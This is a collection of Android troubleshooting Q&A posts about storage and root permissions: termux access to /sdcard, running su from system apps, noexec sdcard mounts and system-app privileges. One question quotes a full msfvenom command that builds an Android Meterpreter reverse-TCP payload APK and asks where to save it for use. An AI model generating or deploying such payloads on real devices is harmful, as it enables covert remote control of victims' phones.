Using the termux (https://termux.com) terminal-emulation program, I type the following command:
ls /sdcard
I get the following error:
ls: can't open '/sdcard': Permission denied
No, my device is not rooted, nor do I plan to root it - so I can not give any information that I'd have to root the device to obtain. However, not being rooted never in the past prevented me from having read access to the /sdcard directory - so this is new (and disturbing).
Granted - it's been a few months since previously I tried to do this - but this new limitation from Android seriously hampers the usability of termux and who-knows-what-else -- as I need to be able to have access to files that are on my SD Card. (I can still do a lot, even if not everything, even without write permissions -- but am pretty much stuck in the water if I can't get read permissions, as is presently the case.)
I've had the same issue, easly solved by typing termux-setup-storage. This will open the window to obtain storage r/w permissions and the job is done.
Be sure to run previously apt update and apt upgrade to have it available.
Related
Quick cyber sec question
Im playing around with metasploit in termux and resolved most issues except for the following:
msfvenom -p android/meterpreter/reverse_tcp LHOST=0.0.0.0 LPORT=000 R> /$HOME/payload.apk
The above code succesfully compiles the reverse_tcp payload however it is saved to the $HOME directory in termux where it is unusable.
Ive attempted doing R> /sdcard/payload.apk but the directory can not be found.
Changing to: R> /$SDcard/payload.apk throws the following error "Read-only file system" which leads me to believe its either a storage permisson problem or OS limitation as im using Android 5.1.1
Does anyone perhaps know how I can get msfvenom to save payloads to internal storage or sdcard where it can be utilized?
Thanks in advance :)
The termux-tools package, which is pre-installed in the distribution has a command termux-setup-storage which will allow Termux to access your Internal Device Storage.
You can also go to App Info > Permissions & Enable Storage in order to allow Termux to access the Internal Storage of your phone which will no longer give you the "Read Only filesystem" error.
P.S. termux-setup-storage also creates a new directory in $HOME with symlinks to important locations in your Internal Storage such as Downloads, Pictures, Music etc.
i.e. in simple terms,
Run termux-setup-storage.
Allow storage permissions.
You're good to go.
I need to mount nfs share from the system app to sdcard or to mnt folder, but mount works only with root access granted. How can I do this? (This is not only the one program, that not work without root. For example, I also need root to use dd to flash custom recovery on my system)
I downloaded AOSP Marshmallow sources, I added su and all it needs to /system/xbin folder. When I try to run su it prints me "Permission denied", but via adb shell root works normally (I can run it in xbin folder). What permissions I need to add to run my system apps as root? Thanks.
System and system apps built and signed with the platform key. App that I am testing has sharedUid=android.uid.system property in Manifest.xml
su as provided by AOSP has restrictions built it to ensure you are the root or shell user invoking it. This check is at https://android.googlesource.com/platform/system/extras/+/master/su/su.c#85
You could always add the system UID (AID_SYSTEM) to this check; however, this would pose a security risk by granting blanket root privileges to all apps/process with the system UID. I would only add the system user to this line in su.c if you are accepting those risks and want an easy solution.
I would recommend re-evaluating your use case and potentially write a native daemon/service that exposes an function for applications to only perform the actions required. You could then enforce these with higher-level android permissions, as well as, POSIX capabilities for the native daemon itself.
The only solution that works for me is the server binary that launched by init as root process. I wrote simple server binary that can be connected via LocalSocket from java side and I can send it some commands. To start server binary on system start, I added next lines to init.rc script:
service suservice /system/bin/suservice
class core
user root
group root
socket suservice stream 0600 system system
On java side I wrote simple library that works via callback interface and receives data from this service or error if something wrong.
Now only apps that started as system:system can use this local socket to run root commands. User apps receive Permission denied as expexted.
P.S. There is no need to run or keep su binary now at all, because server binary already runs as root. I can completly remove su binary from the system now.
I made a filemanager that I want go be able to navegate/modify some system folders (say, /data/). I copied my apk to /system/app, gave 644 permission to the apk file, and rebooted. Yet, my app is still run without root privileges (deny simple access to /data). I'm using Cyanogenmod 11.
Any clue?
Thanks!
L.
To clarify, the app being in the /system/app folder does not run it as root. Android is linux based, so having root access means that your app is able to run shell commands as the root user.
Generally speaking an app being in the /system/app folder makes all declared permissions available to it, (for example, declaring WRITE_SECURE_SETTINGS only does anything for system apps), and then the code that was only available to system apps is now available to yours as well.
For reliability, you should use shell commands where possible for anything that's normally unavailable. Do not use java.io.File to access files that are normally restricted.
I would recommend using RootTools as it makes running shell commands as root much easier. The first 3 pages on this linux command cheat sheet will probably cover everything you need.
I have a rooted tablet that gives adb root as soon as it connects.
When I type adb shell
I get
root#android:/#
I can do su
and it's not showing me any permissions errors
But when I try to execute a file on an sdcard that has already been given all permissions.
I get Permission Denied
Why is this happening?
The sdcard is mounted with a noexec flag, which means you cannot execute things stored there.
This is doubly important when running as root or even the semi privileged shell, since the lack of file permissions or ownership there means any userid with the write external storage permission could trojanize the program you might want to run.
As an aside the default shell has a limited vocabulary of errors and in many versions will also say permission denied as a substitute for command not found. Your current working directory is not in the search path, so if you want to run something from there, you typically need to do:
./filename
We are creating an Android application which requires super user privileges. The SuperUser.apk and su are installed. However there seems to be a difference between installing our application in /data/app vs. /system/app. If we install in /data/app, everything seems to work fine. If we install in /system/app, SuperUser.apk does not popup to grant privileges.
Are there certain types of programs that must be installed in one location vs. another?
TIA
APK files in the /system/app folder already have system-level permissions so they don't require SuperUser, which I assume is why it doesn't pop up.
You should confirm that your application already has the permission you have requested. For instance, AlarmManager.setTime requires the signatureOrSystem permission android.permission.SET_TIME and will throw an exception if it doesn't have it. You can also check explicitly with PackageManager.checkPermission.
If this doesn't work, check the attributes of the APK file. If they don't match the other APKs in the system folder Android may ignore them. You can fix it like this:
chmod 644 <filename>